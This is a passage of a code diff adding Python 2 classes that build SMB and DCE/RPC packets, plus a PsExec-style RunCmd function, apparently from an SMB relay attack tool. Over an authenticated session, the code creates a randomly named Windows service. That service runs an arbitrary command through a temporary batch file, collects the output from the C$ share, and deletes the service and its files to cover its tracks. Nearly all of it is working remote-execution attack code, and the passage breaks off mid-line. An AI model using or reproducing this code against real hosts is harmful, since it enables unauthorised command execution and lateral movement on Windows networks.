+        CompletePacketLen = str(self.fields["wordcount"])+str(self.fields["AndXCommand"])+str(self.fields["reserved"])+str(self.fields["andxoffset"])+str(self.fields["maxbuff"])+str(self.fields["maxmpx"])+str(self.fields["vcnum"])+str(self.fields["sessionkey"])+str(self.fields["securitybloblength"])+str(self.fields["reserved2"])+str(self.fields["capabilities"])+str(self.fields["bcc1"])+str(self.fields["ApplicationHeaderTag"])+str(self.fields["ApplicationHeaderTagLenOfLen"])+str(self.fields["ApplicationHeaderLen"])+str(self.fields["AsnSecMechType"])+str(self.fields["AsnSecMechLenOfLen"])+str(self.fields["AsnSecMechLen"])+str(self.fields["ChoosedTag"])+str(self.fields["ChoosedTagLenOfLen"])+str(self.fields["ChoosedTagLen"])+str(self.fields["ChoosedTag1"])+str(self.fields["ChoosedTag1StrLenOfLen"])+str(self.fields["ChoosedTag1StrLen"])+str(self.fields["Data"])+str(self.fields["NLMPAuthMsgNull"])+str(self.fields["NativeOs"])+str(self.fields["NativeOsTerminator"])+str(self.fields["ExtraNull"])+str(self.fields["NativeLan"])+str(self.fields["NativeLanTerminator"])
+
+        SecurityBlobLenUpdated = str(self.fields["ApplicationHeaderTag"])+str(self.fields["ApplicationHeaderTagLenOfLen"])+str(self.fields["ApplicationHeaderLen"])+str(self.fields["AsnSecMechType"])+str(self.fields["AsnSecMechLenOfLen"])+str(self.fields["AsnSecMechLen"])+str(self.fields["ChoosedTag"])+str(self.fields["ChoosedTagLenOfLen"])+str(self.fields["ChoosedTagLen"])+str(self.fields["ChoosedTag1"])+str(self.fields["ChoosedTag1StrLenOfLen"])+str(self.fields["ChoosedTag1StrLen"])+str(self.fields["Data"])
+
+        ## Packet len
+        self.fields["andxoffset"] = struct.pack("<h", len(CompletePacketLen)+32) #SMB1 Header is always 32
+        ##Buff Len
+        self.fields["securitybloblength"] = struct.pack("<h", len(SecurityBlobLenUpdated))
+        ##Complete Buff Len
+        self.fields["bcc1"] = struct.pack("<h", len(CompletePacketLen)-27) #SessionSetup struct is 27.
+
+class SMBTreeConnectData(Packet):
+    fields = OrderedDict([
+        ("Wordcount", "\x04"),
+        ("AndXCommand", "\xff"),
+        ("Reserved","\x00" ),
+        ("Andxoffset", "\x5a\x00"), 
+        ("Flags","\x08\x00"),
+        ("PasswdLen", "\x01\x00"),
+        ("Bcc","\x2f\x00"),
+        ("Passwd", "\x00"),
+        ("Path","\\\\IPC$"),
+        ("PathTerminator","\x00\x00"),
+        ("Service","?????"),
+        ("Terminator", "\x00"),
+
+    ])
+    def calculate(self): 
+         
+        ##Convert Path to Unicode first before any Len calc.
+        self.fields["Path"] = self.fields["Path"].encode('utf-16le')
+
+        ##Passwd Len
+        self.fields["PasswdLen"] = struct.pack("<i", len(str(self.fields["Passwd"])))[:2]
+
+        ##Packet len
+        CompletePacket = str(self.fields["Wordcount"])+str(self.fields["AndXCommand"])+str(self.fields["Reserved"])+str(self.fields["Andxoffset"])+str(self.fields["Flags"])+str(self.fields["PasswdLen"])+str(self.fields["Bcc"])+str(self.fields["Passwd"])+str(self.fields["Path"])+str(self.fields["PathTerminator"])+str(self.fields["Service"])+str(self.fields["Terminator"])
+
+        self.fields["Andxoffset"] = struct.pack("<i", len(CompletePacket)+32)[:2]
+
+        ##Bcc Buff Len
+        BccComplete    = str(self.fields["Passwd"])+str(self.fields["Path"])+str(self.fields["PathTerminator"])+str(self.fields["Service"])+str(self.fields["Terminator"])
+        self.fields["Bcc"] = struct.pack("<i", len(BccComplete))[:2]
+
+class SMBNTCreateData(Packet):
+    fields = OrderedDict([
+        ("Wordcount",     "\x18"),
+        ("AndXCommand",   "\xff"),
+        ("Reserved",      "\x00" ),
+        ("Andxoffset",    "\x00\x00"),
+        ("Reserved2",     "\x00"),
+        ("FileNameLen",   "\x07\x00"),
+        ("CreateFlags",   "\x16\x00\x00\x00"),
+        ("RootFID",       "\x00\x00\x00\x00"),
+        ("AccessMask",    "\x00\x00\x00\x02"),
+        ("AllocSize",     "\x00\x00\x00\x00\x00\x00\x00\x00"),
+        ("FileAttrib",    "\x00\x00\x00\x00"),
+        ("ShareAccess",   "\x07\x00\x00\x00"),
+        ("Disposition",   "\x01\x00\x00\x00"),   
+        ("CreateOptions", "\x00\x00\x00\x00"),
+        ("Impersonation", "\x02\x00\x00\x00"),
+        ("SecurityFlags", "\x00"),
+        ("Bcc",           "\x08\x00"),
+        ("FileName",      "\\svcctl"),
+        ("FileNameNull",  "\x00"),
+    ])
+
+    def calculate(self):
+
+        Data1= str(self.fields["FileName"])+str(self.fields["FileNameNull"])
+        self.fields["FileNameLen"] = struct.pack("<h",len(str(self.fields["FileName"])))
+        self.fields["Bcc"] = struct.pack("<h",len(Data1))
+
+class SMBReadData(Packet):
+    fields = OrderedDict([
+        ("Wordcount",     "\x0a"),
+        ("AndXCommand",   "\xff"),
+        ("Reserved",      "\x00" ),
+        ("Andxoffset",    "\x00\x00"),
+        ("FID",           "\x00\x00"),
+        ("Offset",        "\x19\x03\x00\x00"), 
+        ("MaxCountLow",   "\xed\x01"),
+        ("MinCount",      "\xed\x01"),
+        ("Hidden",        "\xff\xff\xff\xff"),
+        ("Remaining",     "\x00\x00"),  
+        ("Bcc",           "\x00\x00"),
+        ("Data", ""),
+    ])
+
+    def calculate(self):
+
+        self.fields["Bcc"] = struct.pack("<h",len(str(self.fields["Data"])))
+
+class SMBWriteData(Packet):
+    fields = OrderedDict([
+        ("Wordcount",     "\x0e"),
+        ("AndXCommand",   "\xff"),
+        ("Reserved",      "\x00" ),
+        ("Andxoffset",    "\x00\x00"),
+        ("FID",           "\x06\x40"),
+        ("Offset",        "\xea\x03\x00\x00"),
+        ("Reserved2",     "\xff\xff\xff\xff"),
+        ("WriteMode",     "\x08\x00"),
+        ("Remaining",     "\xdc\x02"),
+        ("DataLenHi",     "\x00\x00"),
+        ("DataLenLow",    "\xdc\x02"),
+        ("DataOffset",    "\x3f\x00"),
+        ("HiOffset",      "\x00\x00\x00\x00"),   
+        ("Bcc",           "\xdc\x02"),
+        ("Data", ""),
+    ])
+
+    def calculate(self):
+        self.fields["Remaining"] = struct.pack("<h",len(str(self.fields["Data"])))
+        self.fields["DataLenLow"] = struct.pack("<h",len(str(self.fields["Data"])))
+        self.fields["Bcc"] = struct.pack("<h",len(str(self.fields["Data"])))
+
+class SMBDCEData(Packet):
+    fields = OrderedDict([
+        ("Version",       "\x05"),
+        ("VersionLow",    "\x00"),
+        ("PacketType",    "\x0b"),
+        ("PacketFlag",    "\x03"),
+        ("DataRepresent", "\x10\x00\x00\x00"),
+        ("FragLen",       "\x2c\x02"),
+        ("AuthLen",       "\x00\x00"),
+        ("CallID",        "\x00\x00\x00\x00"),
+        ("MaxTransFrag",  "\xd0\x16"),
+        ("MaxRecvFrag",   "\xd0\x16"),
+        ("GroupAssoc",    "\x00\x00\x00\x00"),
+        ("CTXNumber",     "\x01"),
+        ("CTXPadding",    "\x00\x00\x00"),
+        ("CTX0ContextID",  "\x00\x00"),
+        ("CTX0ItemNumber", "\x01\x00"),
+        ("CTX0UID", "\x81\xbb\x7a\x36\x44\x98\xf1\x35\xad\x32\x98\xf0\x38\x00\x10\x03"),
+        ("CTX0UIDVersion", "\x02\x00"),
+        ("CTX0UIDVersionlo","\x00\x00"),
+        ("CTX0UIDSyntax",   "\x04\x5d\x88\x8a\xeb\x1c\xc9\x11\x9f\xe8\x08\x00\x2b\x10\x48\x60"),
+        ("CTX0UIDSyntaxVer","\x02\x00\x00\x00"),
+    ])
+
+    def calculate(self):
+
+        Data1= str(self.fields["Version"])+str(self.fields["VersionLow"])+str(self.fields["PacketType"])+str(self.fields["PacketFlag"])+str(self.fields["DataRepresent"])+str(self.fields["FragLen"])+str(self.fields["AuthLen"])+str(self.fields["CallID"])+str(self.fields["MaxTransFrag"])+str(self.fields["MaxRecvFrag"])+str(self.fields["GroupAssoc"])+str(self.fields["CTXNumber"])+str(self.fields["CTXPadding"])+str(self.fields["CTX0ContextID"])+str(self.fields["CTX0ItemNumber"])+str(self.fields["CTX0UID"])+str(self.fields["CTX0UIDVersion"])+str(self.fields["CTX0UIDVersionlo"])+str(self.fields["CTX0UIDSyntax"])+str(self.fields["CTX0UIDSyntaxVer"])
+
+
+        self.fields["FragLen"] = struct.pack("<h",len(Data1))
+
+class SMBDCEPacketData(Packet):
+    fields = OrderedDict([
+        ("Version",       "\x05"),
+        ("VersionLow",    "\x00"),
+        ("PacketType",    "\x00"),
+        ("PacketFlag",    "\x03"),
+        ("DataRepresent", "\x10\x00\x00\x00"),
+        ("FragLen",       "\x2c\x02"),
+        ("AuthLen",       "\x00\x00"),
+        ("CallID",        "\x00\x00\x00\x00"),
+        ("AllocHint",     "\x38\x00\x00\x00"),
+        ("ContextID",     "\x00\x00"),
+        ("Opnum",         "\x0f\x00"),
+        ("Data",          ""),
+
+    ])
+
+    def calculate(self):
+
+        Data1= str(self.fields["Version"])+str(self.fields["VersionLow"])+str(self.fields["PacketType"])+str(self.fields["PacketFlag"])+str(self.fields["DataRepresent"])+str(self.fields["FragLen"])+str(self.fields["AuthLen"])+str(self.fields["CallID"])+str(self.fields["AllocHint"])+str(self.fields["ContextID"])+str(self.fields["Opnum"])+str(self.fields["Data"])
+
+        self.fields["FragLen"] = struct.pack("<h",len(Data1))
+        self.fields["AllocHint"] = struct.pack("<i",len(str(self.fields["Data"])))
+
+class SMBDCESVCCTLOpenManagerW(Packet):
+    fields = OrderedDict([
+        ("MachineNameRefID",     "\xb5\x97\xb9\xbc"),
+        ("MaxCount",             "\x0f\x00\x00\x00"),
+        ("Offset",               "\x00\x00\x00\x00"),
+        ("ActualCount",          "\x0f\x00\x00\x00"),
+        ("MachineName",          "\\\\169.220.1.11"),##This is not taken into consideration.
+        ("MachineNameNull",      "\x00\x00\x00\x00"),
+        ("DbPointer",            "\x00\x00\x00\x00"),
+        ("AccessMask",           "\x3f\x00\x0f\x00"),
+    ])
+
+    def calculate(self):
+        ## Convert to UTF-16LE
+        self.fields["MachineName"] = self.fields["MachineName"].encode('utf-16le')
+
+class SMBDCESVCCTLCreateService(Packet):
+    fields = OrderedDict([
+        ("ContextHandle",        ""),
+        ("MaxCount",             "\x0c\x00\x00\x00"),
+        ("Offset",               "\x00\x00\x00\x00"),
+        ("ActualCount",          "\x0c\x00\x00\x00"),
+        ("ServiceName",          "AyAGaxwLhCP"),
+        ("MachineNameNull",      "\x00\x00"),
+        ("ReferentID",           "\x9c\xfa\x9a\xc9"),
+        ("MaxCountRefID",        "\x11\x00\x00\x00"),
+        ("OffsetID",             "\x00\x00\x00\x00"),
+        ("ActualCountRefID",     "\x11\x00\x00\x00"),
+        ("DisplayNameID",        "DhhUFcsvrfJvLwRq"),
+        ("DisplayNameIDNull",    "\x00\x00\x00\x00"),
+        ("AccessMask",           "\xff\x01\x0f\x00"),
+        ("ServerType",           "\x10\x01\x00\x00"),
+        ("ServiceStartType",     "\x03\x00\x00\x00"),
+        ("ServiceErrorCtl",      "\x00\x00\x00\x00"),
+        ("BinPathMaxCount",      "\xb6\x00\x00\x00"),
+        ("BinPathOffset",        "\x00\x00\x00\x00"),
+        ("BinPathActualCount",   "\xb6\x00\x00\x00"),
+        ("FileName",             ""),
+        ("BinPathName",          ""),
+        ("BinCMD",               ""),
+        ("BintoEnd",             ""),
+        ("BinPathNameNull",      "\x00\x00"),
+        ("Nullz",                "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"),
+    ])
+
+    def calculate(self):
+        self.fields["BinCMD"] = self.fields["BinCMD"].replace("&", "^&")#Filtering
+        self.fields["BinCMD"] = self.fields["BinCMD"].replace("(", "^(")#Filtering
+        self.fields["BinCMD"] = self.fields["BinCMD"].replace(")", "^)")#Filtering
+        self.fields["BinCMD"] = self.fields["BinCMD"].replace("%", "^%")#Filtering
+        self.fields["BinCMD"] = self.fields["BinCMD"].replace(">", "^>")#Filtering
+        self.fields["BinCMD"] = self.fields["BinCMD"].replace(">", "^>")#Filtering
+        self.fields["BinCMD"] = self.fields["BinCMD"].replace("|", "^|")#Filtering
+        self.fields["BinCMD"] = self.fields["BinCMD"].replace(",", "^,")#Filtering
+        self.fields["BinCMD"] = self.fields["BinCMD"].replace("$", "^$")#Filtering
+        self.fields["BinCMD"] = self.fields["BinCMD"].replace("!", "^!")#Filtering
+        self.fields["BinCMD"] = self.fields["BinCMD"].replace(",", "^,")#Filtering
+        self.fields["BinCMD"] = self.fields["BinCMD"].replace("'", "^'")#Filtering
+        self.fields["BinCMD"] = self.fields["BinCMD"].replace("\"", "^\"")#Filtering
+
+        File = "%WINDIR%\\Temp\\"+self.fields["FileName"]
+        WinTmpPath = "%WINDIR%\\Temp\\Results.txt"
+        CleanService = "sc delete "+self.fields["ServiceName"]+"^&"#Start by deleting the service..then run the cmd.
+        FinalCMD = CleanService+"del /F /Q "+File+"^&"+self.fields["BinCMD"]+" ^>"+WinTmpPath+" >"+File
+        #That is: delete service we just ran, delete the bat file (it's loaded in memory, no pb), echo original cmd into random .bat file, run .bat file.
+        self.fields["FileName"] = ""#Reset it.
+        self.fields["BinPathName"] = "%COMSPEC% /C echo "#make sure to escape "&" when using echo.
+        self.fields["BinCMD"] = FinalCMD
+        self.fields["BintoEnd"] = "& %COMSPEC% /C "+File
+        BinDataLen = str(self.fields["BinPathName"])+str(self.fields["BinCMD"])+str(self.fields["BintoEnd"])
+
+        ## Calculate first
+        self.fields["BinPathMaxCount"] = struct.pack("<i",len(BinDataLen)+1)
+        self.fields["BinPathActualCount"] = struct.pack("<i",len(BinDataLen)+1)
+        self.fields["MaxCount"] = struct.pack("<i",len(str(self.fields["ServiceName"]))+1)
+        self.fields["ActualCount"] = struct.pack("<i",len(str(self.fields["ServiceName"]))+1)
+        self.fields["MaxCountRefID"] = struct.pack("<i",len(str(self.fields["DisplayNameID"]))+1)
+        self.fields["ActualCountRefID"] = struct.pack("<i",len(str(self.fields["DisplayNameID"]))+1)
+        ## Then convert to UTF-16LE, yeah it's weird..
+        self.fields["ServiceName"] = self.fields["ServiceName"].encode('utf-16le')
+        self.fields["DisplayNameID"] = self.fields["DisplayNameID"].encode('utf-16le')
+        self.fields["BinPathName"] = self.fields["BinPathName"].encode('utf-16le')
+        self.fields["BinCMD"] = self.fields["BinCMD"].encode('utf-16le')
+        self.fields["BintoEnd"] = self.fields["BintoEnd"].encode('utf-16le')
+
+class SMBDCESVCCTLOpenService(Packet):
+    fields = OrderedDict([
+        ("ContextHandle",        ""),
+        ("MaxCount",             "\x0c\x00\x00\x00"),
+        ("Offset",               "\x00\x00\x00\x00"),
+        ("ActualCount",          "\x0c\x00\x00\x00"),
+        ("ServiceName",          ""),
+        ("MachineNameNull",      "\x00\x00"),
+        ("AccessMask",           "\xff\x01\x0f\x00"),
+    ])
+
+    def calculate(self):
+        ## Calculate first
+        self.fields["MaxCount"] = struct.pack("<i",len(str(self.fields["ServiceName"]))+1)
+        self.fields["ActualCount"] = struct.pack("<i",len(str(self.fields["ServiceName"]))+1)
+        ## Then convert to UTF-16LE, yeah it's weird..
+        self.fields["ServiceName"] = self.fields["ServiceName"].encode('utf-16le')
+
+class SMBDCESVCCTLStartService(Packet):
+    fields = OrderedDict([
+        ("ContextHandle",        ""),
+        ("MaxCount",             "\x00\x00\x00\x00\x00\x00\x00\x00"),
+    ])
+
+class OpenAndX(Packet):
+    fields = OrderedDict([
+        ("Wordcount",             "\x0f"),
+        ("AndXCommand",           "\xff"),
+        ("Reserved",              "\x00" ),
+        ("Andxoffset",            "\x00\x00"),
+        ("Flags",                 "\x07\x00"),
+        ("DesiredAccess",         "\xc2\x00"),
+        ("SearchAttrib",          "\x16\x00"),
+        ("FileAttrib",            "\x20\x00"),
+        ("Created",               "\x40\x9d\xc1\x57"),
+        ("OpenFunc",              "\x12\x00"),
+        ("allocsize",             "\x00\x00\x00\x00"),
+        ("Timeout",               "\x00\x00\x00\x00"),
+        ("Reserved2",             "\x00\x00\x00\x00"),
+        ("Bcc",                   "\x0b\x00"),
+        ("Terminator",            ""),
+        ("File",                  "\\hola.txt"),
+        ("FileNull",              "\x00"),#00 00
+
+    ])
+    def calculate(self):
+        #self.fields["File"] = self.fields["File"].encode('utf-16le')
+        self.fields["Bcc"] = struct.pack("<h",len(str(self.fields["Terminator"])+str(self.fields["File"])+str(self.fields["FileNull"])))
+
+class ReadRequest(Packet):
+    fields = OrderedDict([
+        ("Wordcount",             "\x05"),
+        ("FID",                   "\x02\x40"),
+        ("Count",                 "\xf0\xff"),
+        ("Offset",                "\x00\x00\x00\x00"),
+        ("RemainingBytes",        "\xf0\xff"),
+        ("Bcc",                   "\x00\x00"),
+
+    ])
+
+class ReadRequestAndX(Packet):
+    fields = OrderedDict([
+        ("Wordcount",             "\x0C"),
+        ("AndXCommand",           "\xff"),
+        ("Reserved",              "\x00"),
+        ("AndXOffset",            "\xde\xde"),#
+        ("FID",                   "\x02\x40"),
+        ("Offset",                "\x00\x00\x00\x00"),
+        ("MaxCountLow",           "\xf0\xff"),
+        ("MinCount",              "\xf0\xff"),
+        ("Timeout",               "\xff\xff\xff\xff"),
+        ("RemainingBytes",        "\xf0\xff"),
+        ("HighOffset",            "\x00\x00\x00\x00"),
+        ("Bcc",                   "\x00\x00"),
+
+    ])
+
+
+class CloseRequest(Packet):
+    fields = OrderedDict([
+        ("Wordcount",             "\x03"),
+        ("FID",                   "\x00\x00"),
+        ("LastWrite",             "\xff\xff\xff\xff"),
+        ("Bcc",                   "\x00\x00"),
+
+    ])
+
+class DeleteFileRequest(Packet):
+    fields = OrderedDict([
+        ("Wordcount",             "\x01"),
+        ("SearchAttributes",      "\x06\x00"),
+        ("Bcc",                   "\x1b\x00"),
+        ("BuffType",              "\x04"),
+        ("File",                  ""),
+        ("FileNull",              "\x00\x00"),
+
+    ])
+    def calculate(self):
+        self.fields["File"] = self.fields["File"].encode('utf-16le')
+        self.fields["Bcc"] = struct.pack("<h",len(str(self.fields["BuffType"])+str(self.fields["File"])+str(self.fields["FileNull"])))
+
+class SMBEcho(Packet):
+    fields = OrderedDict([
+        ("Wordcount",             "\x01"),
+        ("EchoCount",             "\x01\x00"),
+        ("Bcc",                   "\x1b\x00"),
+        ("File",                  "LWO CW VLO DEO MAW LMW ARW"),#nt4 style.
+        ("FileNull",              "\x00"),
+
+    ])
+
+###########################PSEXEC#############################################
+
+def ExtractCommandOutput(data):
+    DataLen = struct.unpack("<H", data[61:63])[0]
+    Output = data[63:63+DataLen]
+    return Output
+
+def SMBReadRecv(s):
+    Completedata=[]
+    data=''
+    Start=time.time()
+    s.setblocking(0)
+    while 1:
+        if Completedata and time.time()-Start > 0.5:#Timeout
+            break
+        try:
+            data = s.recv(1024)
+            if data:
+                Completedata.append(data)
+                Start=time.time()
+            else:
+                break
+        except:
+            pass
+
+    s.setblocking(1)
+    return s, ''.join(Completedata)
+
+
+def RunCmd(data, s, clientIP, Username, Domain, Command, Logs, Host):
+    if data == None:
+        return False
+    head = SMBHeader(cmd="\xa2",flag1="\x18", flag2="\x02\x28",mid="\x05\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
+    t = SMBNTCreateData()
+    t.calculate()
+    packet0 = str(head)+str(t)
+    buffer1 = longueur(packet0)+packet0
+    s.send(buffer1)
+    data = s.recv(2048)
+
+    ## Fail Handling.
+    if data[8:10] == "\xa2\x22":
+        print "[+] NT_CREATE denied. SMB Signing mandatory or this user has no privileges on this workstation.\n"
+        return False
+
+    ## DCE/RPC Write.
+    if data[8:10] == "\xa2\x00":
+        head = SMBHeader(cmd="\x2f",flag1="\x18", flag2="\x05\x28",mid="\x06\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
+        x = SMBDCEData()
+        x.calculate()
+        f = data[42:44]
+        t = SMBWriteData(FID=f,Data=x)
+        t.calculate()
+        packet0 = str(head)+str(t)
+        buffer1 = longueur(packet0)+packet0
+        s.send(buffer1)
+        data = s.recv(2048)
+    ## DCE/RPC Read.
+    if data[8:10] == "\x2f\x00":
+            head = SMBHeader(cmd="\x2e",flag1="\x18", flag2="\x05\x28",mid="\x07\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
+            t = SMBReadData(FID=f)
+            t.calculate()
+            packet0 = str(head)+str(t)
+            buffer1 = longueur(packet0)+packet0
+            s.send(buffer1)
+            data = s.recv(2048)
+            ## DCE/RPC SVCCTLOpenManagerW.
+            if data[8:10] == "\x2e\x00":
+                head = SMBHeader(cmd="\x2f",flag1="\x18", flag2="\x05\x28",mid="\x08\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
+                w = SMBDCESVCCTLOpenManagerW(MachineNameRefID="\x00\x00\x03\x00")#, MachineName="\\\\"+Host[0])
+                w.calculate()
+                x = SMBDCEPacketData(Data=w)
+                x.calculate()
+                t = SMBWriteData(FID=f,Data=x)
+                t.calculate()
+                packet0 = str(head)+str(t)
+                buffer1 = longueur(packet0)+packet0
+                s.send(buffer1)
+                data = s.recv(2048)
+                ## DCE/RPC Read Answer.
+                if data[8:10] == "\x2f\x00":
+                    head = SMBHeader(cmd="\x2e",flag1="\x18", flag2="\x05\x28",mid="\x09\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
+                    t = SMBReadData(FID=f)
+                    t.calculate()
+                    packet0 = str(head)+str(t)
+                    buffer1 = longueur(packet0)+packet0
+                    s.send(buffer1)
+                    data = s.recv(2048)
+                    ## DCE/RPC SVCCTLCreateService.
+                    if data[8:10] == "\x2e\xb0":
+                       print "[+] Server returned NT_STATUS_PIPE_DISCONNECTED, no admin rights on that pipe.\n"
+                       return False
+                    ## DCE/RPC SVCCTLCreateService.
+                    if data[8:10] == "\x2e\x00":
+                        if data[len(data)-4:] == "\x05\x00\x00\x00":
+                            print "[+] Failed to open SVCCTL Service Manager, is that user a local admin on this host?\n"
+                            return False
+                        #print "[+] Creating service"
+                        head = SMBHeader(cmd="\x2f",flag1="\x18", flag2="\x05\x28",mid="\x0a\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
+                        ContextHandler = data[88:108]
+                        ServiceNameChars = ''.join([random.choice('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ') for i in range(11)])
+                        ServiceIDChars = ''.join([random.choice('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ') for i in range(16)])
+                        FileChars = ''.join([random.choice('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ') for i in range(6)])+'.bat'
+                        FilePath = FileChars
+                        w = SMBDCESVCCTLCreateService(ContextHandle=ContextHandler,ServiceName=ServiceNameChars,DisplayNameID=ServiceIDChars, FileName=FilePath, ReferentID="\x21\x03\x03\x00",BinCMD=Command)
+                        w.calculate()
+                        x = SMBDCEPacketData(Opnum="\x0c\x00",Data=w)
+                        x.calculate()
+                        t = SMBWriteData(Offset="\x9f\x01\x00\x00",FID=f,Data=x)
+                        t.calculate()
+                        packet0 = str(head)+str(t)
+                        buffer1 = longueur(packet0)+packet0
+                        s.send(buffer1)
+                        data = s.recv(2048)
+                        ## DCE/RPC Read Answer.
+                        if data[8:10] == "\x2f\x00":
+                            head = SMBHeader(cmd="\x2e",flag1="\x18", flag2="\x05\x28",mid="\x0b\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
+                            t = SMBReadData(FID=f,MaxCountLow="\x40\x02", MinCount="\x40\x02",Offset="\x82\x02\x00\x00")
+                            t.calculate()
+                            packet0 = str(head)+str(t)
+                            buffer1 = longueur(packet0)+packet0
+                            s.send(buffer1)
+                            data = s.recv(2048)
+                            ## DCE/RPC SVCCTLOpenService.
+                            if data[8:10] == "\x2e\x00":
+                                if data[len(data)-4:] == "\x05\x00\x00\x00":
+                                    print "[+] Failed to create the service\n"
+                                    return False
+                                #print "[+] Service name: %s with display name: %s successfully created"%(ServiceNameChars, ServiceIDChars)
+                                head = SMBHeader(cmd="\x2f",flag1="\x18", flag2="\x05\x28",mid="\x0c\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
+                                w = SMBDCESVCCTLOpenService(ContextHandle=ContextHandler,ServiceName=ServiceNameChars)
+                                w.calculate()
+                                x = SMBDCEPacketData(Opnum="\x10\x00",Data=w)
+                                x.calculate()
+                                t = SMBWriteData(Offset="\x9f\x01\x00\x00",FID=f,Data=x)
+                                t.calculate()
+                                packet0 = str(head)+str(t)
+                                buffer1 = longueur(packet0)+packet0
+                                s.send(buffer1)
+                                data = s.recv(2048)
+                                ## DCE/RPC Read Answer.
+                                if data[8:10] == "\x2f\x00":
+                                    head = SMBHeader(cmd="\x2e",flag1="\x18", flag2="\x05\x28",mid="\x0d\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
+                                    t = SMBReadData(FID=f,MaxCountLow="\x40\x02", MinCount="\x40\x02",Offset="\x82\x02\x00\x00")
+                                    t.calculate()
+                                    packet0 = str(head)+str(t)
+                                    buffer1 = longueur(packet0)+packet0
+                                    s.send(buffer1)
+                                    data = s.recv(2048)
+                                    ## DCE/RPC SVCCTLStartService.
+                                    if data[8:10] == "\x2e\x00":
+                                        if data[len(data)-4:] == "\x05\x00\x00\x00":
+                                            print "[+] Failed to open the service.\n"
+                                            return False
+                                        ContextHandler = data[88:108]
+                                        head = SMBHeader(cmd="\x2f",flag1="\x18", flag2="\x05\x28",mid="\x0e\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
+                                        w = SMBDCESVCCTLStartService(ContextHandle=ContextHandler)
+                                        x = SMBDCEPacketData(Opnum="\x13\x00",Data=w)
+                                        x.calculate()
+                                        t = SMBWriteData(Offset="\x9f\x01\x00\x00",FID=f,Data=x)
+                                        t.calculate()
+                                        packet0 = str(head)+str(t)
+                                        buffer1 = longueur(packet0)+packet0
+                                        s.send(buffer1)
+                                        data = s.recv(2048)
+                                        ## DCE/RPC Read Answer.
+                                        if data[8:10] == "\x2f\x00":
+                                            head = SMBHeader(cmd="\x2e",flag1="\x18", flag2="\x05\x28",mid="\x0f\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
+                                            t = SMBReadData(FID=f,MaxCountLow="\x40\x02", MinCount="\x40\x02",Offset="\x82\x02\x00\x00")
+                                            t.calculate()
+                                            packet0 = str(head)+str(t)
+                                            buffer1 = longueur(packet0)+packet0
+                                            s.send(buffer1)
+                                            data = s.recv(2048)
+
+
+    ##Tree connect c$
+    if data[8:10] == "\x2e\x00":
+       #print "[+] Command executed, grabbing output now."
+       Logs.info('Command executed:')
+       Logs.info(clientIP+","+Username+','+Command)
+       #time.sleep(1)#Maybe the command executed took some time..
+       #print "[+] Removing service.\n[+] Cleaning up files.\n"
+       head = SMBHeader(cmd="\x75",flag1="\x18", flag2="\x07\xc8",mid="\x10\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
+       t = SMBTreeConnectData(Path="\\\\"+Host[0]+"\\C$")
+       t.calculate()
+       packet1 = str(head)+str(t)
+       buffer1 = longueur(packet1)+packet1
+       s.send(buffer1)
+       data = s.recv(2048)
+       ##OpenAndX.
+       if data[8:10] == "\x75\x00":
+          head = SMBHeader(cmd="\x2d",flag1="\x10", flag2="\x00\x10",uid=data[32:34],tid=data[28:30],pid=data[30:32],mid="\x11\x00")
+          t = OpenAndX(File="\\Windows\\Temp\\Results.txt", OpenFunc="\x01\x00")
+          t.calculate()
+          packet1 = str(head)+str(t)
+          buffer1 = longueur(packet1)+packet1  
+          s.send(buffer1)
+          data = s.recv(2048)
+          ##OpenAndX.
+          if data[8:10] == "\x2d\x34":
+             time.sleep(1)#not found, maybe still processing the cmd. Wait a bit.
+             head = SMBHeader(cmd="\x2d",flag1="\x10", flag2="\x00\x10",uid=data[32:34],tid=data[28:30],pid=data[30:32],mid="\x11\x00")
+             t = OpenAndX(File="\\Windows\\Temp\\Results.txt", OpenFunc="\x01\x00")
+             t.calculate()
+             packet1 = str(head)+str(t)
+             buffer1 = longueur(packet1)+packet1  
+             s.send(buffer1)
+             data = s.recv(2048)
+          ##OpenAndX.
+          if data[8:10] == "\x2d\x34":
+             time.sleep(1)#not found, command failed.
+             print "[+] The command failed."
+             return data
+    ##ReadRequest.
+    ## Need grab the size from Open And X and do it properly later. For now, only 65535 bytes printed.
+    if data[8:10] == "\x2d\x00":
+       ReturnedFID = data[41:43]
+       head = SMBHeader(cmd="\x2e",uid=data[32:34],tid=data[28:30],pid=data[30:32],mid="\x12\x00")
+       t = ReadRequestAndX(FID=ReturnedFID)
+       packet1 = str(head)+str(t)
+       buffer1 = longueur(packet1)+packet1  
+       s.send(buffer1)
+       s, data = SMBReadRecv(s)
+       #print "[+] Output:\n"
+       print ExtractCommandOutput(data)
+
+       ##Close Request
+       if data[8:10] == "\x2e\x00":
+          head = SMBHeader(cmd="\x04",flag1="\x18", flag2="\x00\x10",uid=data[32:34],tid=data[28:30],pid=data[30:32],mid="\x11\x00")
+          t = CloseRequest(FID = ReturnedFID)
+          packet1 = str(head)+str(t)
+          buffer1 = longueur(packet1)+packet1  
+          s.send(buffer1)
+          data = s.recv(2048)
+
+    ##DeleteFileRequest.
+    if data[8:10] == "\x04\x00":
+       head = SMBHeader(cmd="\x06",uid=data[32:34],tid=data[28:30],pid=data[30:32],mid="\x13\x00")
+       t = DeleteFileRequest(File="\\Windows\\Temp\\Results.txt")
+       t.calculate()
+       packet1 = str(head)+str(t)
+       buffer1 = longueur(packet1)+packet1  
+       #print "[+] Deleting file now."
+       s.send(buffer1)
+       data = s.recv(2048)
+
+    if data[8:10] == "\x06\x00":
+       #print "[+] File deleted, making sure it's not there anymore.." 
